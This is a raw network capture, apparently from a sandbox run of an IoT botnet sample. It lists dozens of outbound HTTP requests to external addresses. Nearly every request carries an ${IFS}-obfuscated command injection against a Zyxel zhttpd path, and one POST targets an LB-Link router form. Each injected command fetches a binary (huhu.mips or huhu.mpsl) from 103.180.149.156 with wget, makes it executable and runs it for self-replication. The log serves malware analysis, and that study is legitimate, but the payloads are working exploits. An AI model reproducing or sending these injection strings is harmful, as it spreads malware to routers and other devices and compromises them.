                                            Feb 2, 2024 06:21:16.706945896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5402192.168.2.1551378183.5.23.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706968069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5403192.168.2.153480882.235.165.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707017899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5404192.168.2.1538172124.185.188.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707051039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5405192.168.2.1544068154.50.112.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707097054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5406192.168.2.153797675.85.69.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707117081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5407192.168.2.155729432.2.93.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707151890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5408192.168.2.1551032202.167.101.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707181931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5409192.168.2.1541402223.162.186.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707235098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5410192.168.2.154861436.154.124.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707263947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5411192.168.2.153462694.65.179.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707314014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5412192.168.2.153805062.87.234.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.707345963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5413192.168.2.154266488.5.70.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710208893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5414192.168.2.1549586130.94.156.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710675955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5415192.168.2.1559692137.101.168.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710709095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5416192.168.2.1539218162.44.177.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710758924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5417192.168.2.1559040109.127.69.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710813046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5418192.168.2.1538332108.53.36.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710833073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5419192.168.2.154811084.55.151.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710886955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5420192.168.2.15466145.123.88.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710922003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5421192.168.2.156069637.205.148.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.710947990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5422192.168.2.1551266103.164.123.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.711000919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5423192.168.2.1556174104.100.138.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.711025953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5424192.168.2.1558246168.220.81.528080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.639689922 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5425192.168.2.155750018.18.26.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719352961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5426192.168.2.154637220.37.87.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719391108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5427192.168.2.154165441.88.20.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719425917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5428192.168.2.155044898.173.119.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719459057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5429192.168.2.15370545.208.246.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719501972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5430192.168.2.1551024134.176.87.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719532013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5431192.168.2.1554820103.11.38.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719587088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5432192.168.2.1549106111.103.225.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719608068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5433192.168.2.153591293.144.30.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719644070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5434192.168.2.1559334185.117.135.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719703913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5435192.168.2.1534512161.87.135.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719743013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5436192.168.2.154358445.4.242.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719780922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5437192.168.2.154597432.35.118.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719815969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5438192.168.2.155082258.130.19.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719849110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5439192.168.2.1544544201.121.88.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719881058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5440192.168.2.155979695.225.42.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719912052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5441192.168.2.1537092217.79.174.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.719970942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5442192.168.2.1555520138.136.22.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720007896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5443192.168.2.1556276182.153.217.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720031977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5444192.168.2.1544894111.193.46.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720062971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5445192.168.2.1552906135.220.193.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720089912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5446192.168.2.154251898.186.10.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720127106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5447192.168.2.1536254155.190.190.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720161915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5448192.168.2.1536806123.170.25.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720196962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5449192.168.2.154710079.60.202.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720242977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5450192.168.2.1542780107.109.100.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720320940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5451192.168.2.153703870.97.196.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720326900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5452192.168.2.1547904124.108.161.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720355988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5453192.168.2.1548546149.59.118.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720411062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5454192.168.2.156053853.19.117.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720438004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5455192.168.2.1552038179.14.234.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720465899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5456192.168.2.154087814.75.233.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720489979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5457192.168.2.1541992126.135.238.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720549107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5458192.168.2.153344635.16.68.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720583916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5459192.168.2.1552656188.192.14.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720603943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5460192.168.2.153681445.70.196.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720640898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5461192.168.2.1551636113.151.130.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720685005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5462192.168.2.1534096134.54.6.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720732927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5463192.168.2.1547760197.245.252.212443
                                            TimestampBytes transferredDirectionData
